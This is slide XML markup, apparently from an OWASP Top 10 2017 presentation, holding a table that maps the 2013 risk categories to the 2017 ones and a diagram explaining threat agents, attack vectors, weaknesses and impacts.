                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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A6:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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Security Misconfiguration</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="accent3"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="Arial"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6"/>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A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>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Missing</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>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Function</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Level</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>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Access</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>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Contr </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Merged+A4]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="4E8542"/>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accent4"/>
                          </a:solidFill>
                          <a:latin typeface="Wide Latin" panose="020A0A07050505020404" pitchFamily="18" charset="0"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>∪</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="002060"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A7</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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Cross-Site Scripting (XSS)</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0007"/>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A8 – Cross-Site Request Forgery (CSRF)</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kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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A8:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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Insecure Deserialization </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW, Community]</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8"/>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A9 – Using Components with Known Vulnerabilities</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4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A9:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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Using Components with Known Vulnerabilities</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9"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10 – Unvalidated Redirects and Forwards</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>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kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="C00000"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="OpenSymbol"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" kern="1200" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="C00000"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A10:2017</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" dirty="0">
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Insufficient</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Logging</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>&amp;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Monitoring</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>[NEW,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="950" b="1" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="4E8542"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Comm.]</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10"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="11" name="Elbow Connector 10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="2819402" y="7543798"/>
            <a:ext cx="609600" cy="4"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="4A1647"/>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10"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="6934200"/>
            <a:ext cx="533400" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 230"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="28575">
            <a:solidFill>
              <a:srgbClr val="4A1647"/>
            </a:solidFill>
            <a:headEnd type="oval" w="sm" len="sm"/>
            <a:tailEnd type="stealth"/>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 name="Table 67"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3576608917"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="990600"/>
          <a:ext cx="6858000" cy="3873909"/>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81000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
                        <a:t>What</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" baseline="0" dirty="0"/>
                        <a:t> Are Application Security Risks?</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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492909">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>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r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attackers can potentially use many different paths through your application to do harm to your business or organization. Each of these paths represents a risk that may, or may not, be serious enough to warrant attention.</a:t>
                      </a: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r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Sometimes, these paths are trivial to find and exploit and sometimes they are extremely difficult. Similarly, the harm that is caused may be of no consequence, or it</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> may </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>put you out of business. To determine the risk to your organization, you can evaluate the likelihood associated with each threat agent, attack vector, and security weakness and combine it with an estimate of the technical and business impact to your organization.  Together, these factors determine your</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>overall risk.</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5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="1981200"/>
            <a:ext cx="6172200" cy="2105025"/>
            <a:chOff x="304800" y="2085975"/>
            <a:chExt cx="6172200" cy="2105025"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="2" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="3343275"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5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  Weakness</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="5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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="495300" y="2505075"/>
              <a:ext cx="139700" cy="304800"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7"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p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="8"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sp>
            <p:nvSpPr>
              <p:cNvPr id="9"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sp>
            <p:nvSpPr>
              <p:cNvPr id="10"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sp>
            <p:nvSpPr>
              <p:cNvPr id="11"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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2490788"/>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Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="304800" y="2085975"/>
              <a:ext cx="516488" cy="30232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rPr>
                <a:t>Threat</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Agents</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="2466975"/>
              <a:ext cx="762000" cy="381000"/>
            </a:xfrm>
            <a:prstGeom prst="foldedCorner">
              <a:avLst>
                <a:gd name="adj" fmla="val 125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Impact</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="13" name="Group 115"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2362201" y="2466971"/>
              <a:ext cx="1142999" cy="390260"/>
              <a:chOff x="2418" y="2736"/>
              <a:chExt cx="750" cy="295"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="3"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  Weakness</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="4"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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="15" name="Group 63"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="498475" y="2924175"/>
              <a:ext cx="139700" cy="304800"/>
              <a:chOff x="96" y="1344"/>
              <a:chExt cx="288" cy="624"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="25"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p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="26"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sp>
            <p:nvSpPr>
              <p:cNvPr id="27"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sp>
            <p:nvSpPr>
              <p:cNvPr id="28"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sp>
            <p:nvSpPr>
              <p:cNvPr id="29"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grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="2924175"/>
              <a:ext cx="838200" cy="357187"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrowCallout">
              <a:avLst>
                <a:gd name="adj1" fmla="val 20889"/>
                <a:gd name="adj2" fmla="val 24667"/>
                <a:gd name="adj3" fmla="val 34667"/>
                <a:gd name="adj4" fmla="val 8013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Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1354769" y="2085975"/>
              <a:ext cx="550151" cy="30232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rPr>
                <a:t>Attack</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Vectors</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2727423" y="2085975"/>
              <a:ext cx="777777" cy="30232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rPr>
                <a:t>Security</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Weaknesses</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4621087" y="2085975"/>
              <a:ext cx="636713" cy="30232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rPr>
                <a:t>Technical</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impacts</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 89"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5809634" y="2085975"/>
              <a:ext cx="599843" cy="30232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rPr>
                <a:t>Business</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0">
                <a:lnSpc>
                  <a:spcPts val="800"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Impacts</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="AutoShape 163"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1371600" y="3352800"/>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Attack</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="29241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Impact</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="60" name="AutoShape 142"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5715000" y="33813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Impact</a:t>
              </a:r>
            </a:p>
          </p:txBody>
